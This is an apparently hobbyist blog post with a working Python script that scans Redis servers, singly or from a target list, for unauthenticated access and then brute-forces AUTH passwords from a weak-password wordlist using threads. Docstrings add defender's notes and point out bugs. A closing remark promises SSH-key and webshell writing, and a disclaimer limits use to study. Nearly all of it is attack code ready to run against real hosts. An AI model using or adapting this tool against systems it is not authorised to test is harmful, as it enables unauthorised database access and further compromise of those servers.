python3 Redis利用脚本
### Redis weakpassword
import sys
import getopt
import socket
import threading
def passwd_dict(password_dict):
    """Load a newline-separated word list from the file at *password_dict*.

    The path is coerced with str() and opened read-only as UTF-8. Each line
    has only its trailing newline character removed (any other trailing
    whitespace, such as a carriage return from CRLF files, is kept), and
    the entries are returned as a list of str in file order, empty lines
    included.
    """
    # The context manager closes the file on exit, whether or not an
    # exception is raised while reading.
    with open(str(password_dict), 'r', encoding='utf-8') as fh:
        return [line.rstrip('\n') for line in fh]
def unauthorized(ip, port):
    """Probe a single Redis instance for unauthenticated access.

    Opens a TCP connection to ip:port with a 5 s timeout, sends a bare
    ``INFO`` command without authenticating first, and reads up to 1024
    bytes of the reply. If the reply contains ``redis_version`` the server
    answered a command without requiring ``AUTH``: a result line is
    printed and returned as a str. Any exception (connection refused,
    timeout, decode error, ...) is printed and swallowed, and the function
    then returns None, as it does when the marker is absent.

    Defender's note: a server that answers this probe is reachable without
    a password; ``requirepass``/ACL users, ``protected-mode`` and a
    restricted ``bind`` address are the configuration controls that stop
    it, and the unauthenticated INFO itself is visible in command logging.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5.0)
        s.connect((ip, int(port)))
        send_data = 'INFO\r\n'
        s.send(send_data.encode())
        # Single recv: only the first 1024 bytes of the reply are inspected.
        response = bytes.decode(s.recv(1024))
        if 'redis_version' in response:
            result = "[!] {0}:{1} 存在未授权访问 [!]".format(ip, port)
            print(result)
            return result
            # Unreachable: it follows the return above.
            sys.exit()
    except Exception as e:
        # NOTE: the socket is never closed explicitly on either path; it is
        # released only when ``s`` is garbage-collected.
        print("[-] {0}:{1} {2} [-]".format(ip, port, e))
def intruder(ip, port, passwd):
    """Try every entry of *passwd* as the AUTH password on one Redis instance.

    Opens a single TCP connection to ip:port (5 s timeout) and, for each
    candidate, sends ``AUTH <candidate>`` and reads up to 1024 bytes of the
    reply. The first reply containing ``+OK`` is printed as a weak-password
    finding and the process is terminated with ``sys.exit()``; a
    ``SystemExit`` is not an ``Exception`` and so passes through the handler
    below. Any other exception is printed and swallowed. Nothing is
    returned on any path.

    Defender's note: all attempts share one long-lived client connection,
    so a run of failed AUTH replies from a single client is the observable
    signature of this loop; ACL users with strong passwords and
    ``protected-mode`` bound to trusted interfaces are the mitigations.
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5.0)
        s.connect((ip, int(port)))
        print("[*] 正在对{0}:{1}的密码进行爆破 [*]".format(ip, port))
        for p in passwd:
            # Inline protocol: the candidate is interpolated verbatim.
            send_data = 'AUTH {0}\r\n'.format(p)
            s.send(send_data.encode())
            print("[*] 正在尝试密码 {0} [*]".format(p))
            # One recv per attempt; only the first 1024 bytes are examined.
            response = bytes.decode(s.recv(1024))
            if '+OK' in response:
                result = "[!] {0}:{1} 存在弱口令 {2} [!]".format(ip, port, p)
                print(result)
                # When this runs in a worker thread (see main), SystemExit
                # ends only that thread, not the whole program.
                sys.exit()
    except Exception as e:
        # NOTE: the socket is never closed explicitly; see unauthorized().
        print("[-] {0}:{1} {2} [-]".format(ip, port, e))
def main(ip, port, passwd):
    """Dispatch the access probe and the AUTH loop over one or many targets.

    Args:
        ip: a single host string, or a list of host strings.
        port: a single port string, or a list of port strings parallel
            to ``ip`` (same length, same order).
        passwd: list of candidate passwords, as produced by passwd_dict().

    For a single target the probe and the AUTH loop run sequentially in the
    calling thread. For lists, the probe runs inline for each target and a
    separate thread is started per target for the AUTH loop; the threads
    are never joined. If neither branch matches the function silently does
    nothing. Nothing is returned.
    """
    # NOTE: ``type(ip) and type(port)`` evaluates to ``type(port)`` because a
    # type object is always truthy, so only the type of ``port`` is actually
    # tested by both conditions below.
    if (type(ip) and type(port)) is str:
        unauthorized(ip, port)
        intruder(ip, port, passwd)
    elif (type(ip) and type(port)) is list:
        # A ``port`` list shorter than ``ip`` raises IndexError here.
        for i in range(len(ip)):
            target_ip = ip[i]
            target_port = port[i]
            unauthorized(target_ip, target_port)
            # intruder() calls sys.exit() on success; inside a worker thread
            # that stops only this thread, so the other targets keep running.
            t = threading.Thread(target=intruder, args=(target_ip, target_port, passwd))
            t.start()
if __name__ == '__main__':
    # Command-line entry point: parse options, build the target(s) and the
    # password list, then hand off to main().
    try:
        # -i and -p take a value, -h is a flag; --target/--passwd take a
        # value. Unknown options raise getopt.GetoptError (caught below).
        opts, args = getopt.getopt(sys.argv[1:], '-i:-p:-h', ["target=", "passwd="])
        # print(opts)
        for opt_name, opt_value in opts:
            if opt_name == '-h':
                print('[*] THIS IS HELP INFORMATION [*]\n'
                      '[*] -i + vulnerable-ip [*]\n'
                      '[*] -p + vulnerable-port [*]\n'
                      '[*] --target=vulnerable-target.txt [*]\n'
                      '[*] --passwd=vulnerable-passwd.txt [*]\n'
                      '[*] Example:python3 -i 127.0.0.1 -p 6379 --passwd=passwd.txt [*]\n'
                      '[*] Example:python3 --target=target.txt --passwd=passwd.txt [*]\n')
                # SystemExit is not an Exception, so this really exits.
                sys.exit()
            if opt_name in ('-i',):
                ip = opt_value
            if opt_name in ('-p',):
                port = opt_value
            if opt_name in ('--target',):
                # One "host:port" per line; ip and port become parallel lists
                # that main() indexes in lockstep.
                with open(opt_value) as f:
                    data = f.readlines()
                target = []
                ip = []
                port = []
                for i in data:
                    target.append(i.rstrip('\n'))
                for t in target:
                    # A line without ':' raises IndexError on the port
                    # lookup; it is caught by the handler below.
                    ip.append(t.split(':')[0])
                    port.append(t.split(':')[1])
            if opt_name in ('--passwd',):
                password_dict = opt_value
            if '--passwd' not in opt_name:
                # Runs on every iteration whose option is not --passwd, so a
                # --passwd given BEFORE another option is overwritten by this
                # default; the override only survives when --passwd is last.
                password_dict = '1000弱口令.txt'
        # If only one of -i/-p was given, the other name is unbound here and
        # the NameError is printed by the handler below.
        passwd = passwd_dict(password_dict)
        main(ip, port, passwd)
    except Exception as e:
        print(e)
```
ps:简单记录下,后续会延展下windows的目录爆破或针对性的爆破web目录,以及添加写ssh key和webshell,欢迎各位师傅们评论指正缺点~
所有内容仅限于维护网络安全学习参考